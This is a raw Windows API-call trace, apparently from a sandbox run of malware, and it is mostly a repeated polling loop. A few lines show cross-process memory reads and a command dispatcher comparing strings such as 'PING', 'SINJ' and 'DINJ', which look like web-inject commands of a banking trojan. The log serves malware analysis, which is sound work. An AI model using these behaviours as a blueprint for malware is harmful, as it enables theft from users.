	[0247.527] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0247.527] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0247.527] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0247.527] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0247.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1618
	[0247.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bfdd8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xe30) returned 0x708
	[0247.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c25d8
	[0247.527] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.527] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.527] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.527] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.527] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.527] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c25d8) returned 1
	[0247.527] Sleep (dwMilliseconds=0xbb8) 
	[0247.542] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.542] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.542] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.542] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.542] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.542] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.542] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01e8) returned 1
	[0247.542] Sleep (dwMilliseconds=0xbb8) 
	[0247.557] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.557] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.557] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.558] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.558] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.558] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.558] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01e8) returned 1
	[0247.558] Sleep (dwMilliseconds=0xbb8) 
	[0247.573] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.573] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.573] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.573] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.573] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.573] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.573] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0238) returned 1
	[0247.573] Sleep (dwMilliseconds=0xbb8) 
	[0247.589] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.589] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.589] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.589] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.589] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.589] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0238) returned 1
	[0247.589] Sleep (dwMilliseconds=0xbb8) 
	[0247.604] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.604] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.604] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.604] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.604] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.604] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.604] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0238) returned 1
	[0247.604] Sleep (dwMilliseconds=0xbb8) 
	[0247.620] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.620] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.620] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.620] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.620] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.620] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.620] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0238) returned 1
	[0247.620] Sleep (dwMilliseconds=0xbb8) 
	[0247.635] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.635] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.635] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.635] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.635] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.635] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.635] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.636] Sleep (dwMilliseconds=0xbb8) 
	[0247.651] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.651] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.651] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.651] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.651] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.651] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.651] Sleep (dwMilliseconds=0xbb8) 
	[0247.667] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.667] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.667] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.667] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.667] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.667] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.667] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.668] Sleep (dwMilliseconds=0xbb8) 
	[0247.683] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.683] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.683] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.683] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.683] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.683] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.683] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.683] Sleep (dwMilliseconds=0xbb8) 
	[0247.698] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.698] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.698] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.698] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.698] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.698] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.698] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.698] Sleep (dwMilliseconds=0xbb8) 
	[0247.714] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.714] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.714] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.714] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.714] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.715] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.715] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.715] Sleep (dwMilliseconds=0xbb8) 
	[0247.730] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.730] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.731] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.731] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.731] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.731] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.731] Sleep (dwMilliseconds=0xbb8) 
	[0247.791] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.791] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.791] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.791] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.792] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.792] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0247.792] Sleep (dwMilliseconds=0xbb8) 
	[0247.839] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.839] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.839] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.839] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.839] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.840] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.840] Sleep (dwMilliseconds=0xbb8) 
	[0247.885] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.885] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.885] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.885] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.885] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.885] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.885] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.885] Sleep (dwMilliseconds=0xbb8) 
	[0247.908] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.908] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.908] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.908] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.908] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.908] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.908] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.908] Sleep (dwMilliseconds=0xbb8) 
	[0247.939] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.939] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.939] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.939] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.939] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.940] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.940] Sleep (dwMilliseconds=0xbb8) 
	[0247.948] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.948] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.948] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.948] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.948] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.948] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.948] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.948] Sleep (dwMilliseconds=0xbb8) 
	[0247.963] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.963] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.964] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.964] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.964] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.964] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.964] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.964] Sleep (dwMilliseconds=0xbb8) 
	[0247.979] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.979] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.979] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.979] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.979] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.979] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.979] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.980] Sleep (dwMilliseconds=0xbb8) 
	[0247.995] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.995] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.995] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.995] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.995] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.995] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.995] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0247.995] Sleep (dwMilliseconds=0xbb8) 
	[0248.057] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0248.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0248.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0248.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0248.057] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0248.057] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b00, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b00*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0248.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0248.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15a0
	[0248.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x27e15a0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0248.057] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0248.058] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0248.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0248.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c04b8
	[0248.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x27c04b8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0248.058] SetEvent (hEvent=0x474) returned 1
	[0248.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0248.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0248.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0248.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c04e0
	[0248.058] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0248.058] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0248.058] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0248.058] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0248.058] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0248.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e16d8
	[0248.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0328, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdb4) returned 0x5b8
	[0248.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0080
	[0248.059] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.059] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.059] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.059] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.059] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.059] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0080) returned 1
	[0248.059] Sleep (dwMilliseconds=0xbb8) 
	[0248.072] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.072] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.072] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.072] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.072] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.072] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.072] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0080) returned 1
	[0248.072] Sleep (dwMilliseconds=0xbb8) 
	[0248.119] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.119] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.119] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.119] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.119] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.119] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0080) returned 1
	[0248.119] Sleep (dwMilliseconds=0xbb8) 
	[0248.134] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.134] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.134] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.134] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.135] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.135] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0080) returned 1
	[0248.135] Sleep (dwMilliseconds=0xbb8) 
	[0248.150] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.150] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.150] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.150] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.150] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.151] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0080) returned 1
	[0248.151] Sleep (dwMilliseconds=0xbb8) 
	[0248.166] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.166] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.166] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.166] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.166] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.166] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.166] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c01c0) returned 1
	[0248.166] Sleep (dwMilliseconds=0xbb8) 
	[0248.190] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.190] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.190] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.190] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.190] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.190] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.190] Sleep (dwMilliseconds=0xbb8) 
	[0248.197] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.197] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.197] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.197] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.197] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.197] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.197] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.197] Sleep (dwMilliseconds=0xbb8) 
	[0248.212] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.213] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.213] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.213] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.213] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.213] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.213] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.213] Sleep (dwMilliseconds=0xbb8) 
	[0248.228] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.228] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.228] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.228] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.228] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.228] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.228] Sleep (dwMilliseconds=0xbb8) 
	[0248.244] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.244] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.244] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.244] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.244] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.244] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.244] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.244] Sleep (dwMilliseconds=0xbb8) 
	[0248.259] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.259] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
